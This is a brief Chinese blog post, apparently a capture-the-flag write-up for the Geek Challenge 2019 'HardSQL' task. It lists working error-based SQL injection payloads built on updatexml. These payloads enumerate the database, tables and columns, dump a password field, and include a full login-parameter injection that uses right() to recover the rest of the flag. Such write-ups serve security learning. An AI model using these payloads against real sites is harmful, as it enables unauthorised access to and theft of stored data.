[极客大挑战 2019]HardSQL

本题考查报错注入

注入过程如下所示：

updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)
updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)
updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1)
updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1)

这样只能出来一半的flag，另一半用left()right()语句查询拼接

username=admin'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=21

posted @ 2020-04-27 08:20 星火不辍阅读(627) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

你再不来，我就要下雪了

一厢情愿，就得愿赌服输

[极客大挑战 2019]HardSQL

公告